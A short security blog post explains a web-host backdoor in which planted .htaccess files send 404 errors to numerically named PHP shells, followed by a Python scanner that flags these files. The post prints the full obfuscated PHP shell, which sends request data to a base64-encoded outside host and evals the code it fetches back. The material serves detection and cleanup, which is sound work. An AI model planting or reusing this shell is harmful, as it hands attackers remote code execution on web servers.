numbered filename .htaccess 404 redirect to php remote shells

June 30, 2011 at 2:36 am

A common backdoor once a host is compromised is to create, or append to existing, .htaccess files a 404 redirect that opens a remote shell to a control server when the .php is hit, usually by legitimate crawling. Attackers intentionally backlink to nonexistent URLs on the compromised host so that Google et al. do the job of opening a remote shell to their control node. A symptom of this is a spike in load and in the number of connections in the WAITING state while the host is being crawled.

The pair of .htaccess and .php files is usually generated into every single folder, with unique filenames. The filename of the PHP shell is usually a 4-6 digit number, but is sometimes a reused dictionary word instead. The .htaccess always contains the string “ErrorDocument 404 //”, with two forward slashes leading the filename, and is usually less than 200 bytes:

Options -MultiViews
ErrorDocument 404 //wp-content/upload/2008/11/12433.php

There is little variation in the PHP number shell; what varies is usually the payload and the destination. A common file size is 1474 bytes, and a common string is ‘aHR0cDov’, which is the base-64 encoding of ‘http:/’.

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z=”/?”.base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($d).”.”.base64_encode($e).”.”.base64_encode($f).”.”.base64_encode($g).”.”.base64_encode($h).”.e.”.base64_encode($i).”.”.base64_encode($j);$f=base64_decode(“cGhwc2VhcmNoLmNu”);if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])==”a23ab92502c0050082dd96a32c754520″) $f=$_REQUEST["id"];if((include(base64_decode(“aHR0cDovL2FkczIu”).$f.$z)));else if($c=file_get_contents(base64_decode(“aHR0cDovLzcu”).$f.$z))eval($c);else{$cu=curl_init(base64_decode(“aHR0cDovLzcxLg==”).$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
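The indicators above (an .htaccess under 200 bytes carrying “ErrorDocument 404 //”, a PHP file with a 4-6 digit numeric name, the ‘aHR0cDov’ string, and the two files appearing as a pair) can be turned into a quick sweep of a document root. The script below is an added example, not code from the original post; it builds a small constructed directory tree (a clean site plus one infected folder whose PHP file is a harmless placeholder that only carries the marker string), walks it, and reports which files match, pairing each flagged .htaccess with its 404 target. Paths and sample contents are constructed for the example.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators taken from the post: the .htaccess always carries this string
# (two slashes before the path) and is usually under 200 bytes; the PHP shell
# usually has a 4-6 digit numeric filename and contains base64("http:/").
HTACCESS_MARKER = "ErrorDocument 404 //"
HTACCESS_MAX_BYTES = 200
NUMERIC_PHP_NAME = re.compile(r"^\d{4,6}\.php$")
B64_HTTP_MARKER = b"aHR0cDov"
ERRORDOC_LINE = re.compile(r"^\s*ErrorDocument\s+404\s+//(\S+)", re.MULTILINE)


def check_htaccess(path: Path):
    """Return a finding if this .htaccess looks like the 404-redirect backdoor, else None."""
    data = path.read_bytes()
    text = data.decode("utf-8", errors="replace")
    if HTACCESS_MARKER not in text:
        return None
    m = ERRORDOC_LINE.search(text)
    return {
        "type": "htaccess",
        "path": str(path),
        "size": len(data),
        "small": len(data) < HTACCESS_MAX_BYTES,
        "target": m.group(1) if m else None,  # path after the leading "//"
    }


def check_php(path: Path):
    """Return a finding if this .php file matches the number-shell indicators, else None."""
    reasons = []
    if NUMERIC_PHP_NAME.match(path.name):
        reasons.append("numeric-filename")
    data = path.read_bytes()
    if B64_HTTP_MARKER in data:
        reasons.append("base64-http-marker")
    if not reasons:
        return None
    return {"type": "php", "path": str(path), "size": len(data), "reasons": reasons}


def scan(root):
    """Walk a document root and return suspicious .htaccess and .php files."""
    root = Path(root)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if name == ".htaccess":
                f = check_htaccess(p)
            elif name.lower().endswith(".php"):
                f = check_php(p)
            else:
                f = None
            if f:
                findings.append(f)
    # Pair each flagged .htaccess with its 404 target, resolved from the
    # document root: an existing target is the htaccess/php pair described above.
    for f in findings:
        if f["type"] == "htaccess" and f["target"]:
            f["target_exists"] = (root / f["target"].lstrip("/")).is_file()
    return findings


def build_sample_tree():
    """Create a constructed document root: a clean site plus one infected folder."""
    root = Path(tempfile.mkdtemp(prefix="htaccess-scan-"))
    # Benign .htaccess: an ordinary custom 404 page, single slash, no marker.
    (root / ".htaccess").write_text("ErrorDocument 404 /404.html\n")
    (root / "404.html").write_text("<h1>Not found</h1>\n")
    (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
    # Infected folder: the pair from the post. The PHP body is a constructed
    # placeholder carrying only the marker string, not the real shell.
    d = root / "wp-content" / "upload" / "2008" / "11"
    d.mkdir(parents=True)
    (d / ".htaccess").write_text(
        "Options -MultiViews\n"
        "ErrorDocument 404 //wp-content/upload/2008/11/12433.php\n"
    )
    (d / "12433.php").write_text("<?php /* constructed sample */ $m = 'aHR0cDov'; ?>\n")
    return root


if __name__ == "__main__":
    # Replace build_sample_tree() with the real document root to sweep a host.
    for finding in scan(build_sample_tree()):
        print(finding)
```

On a real host, point scan() at the web root and review every .htaccess it flags; the post notes the backdoor is dropped into every folder, so a single hit usually means many more.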
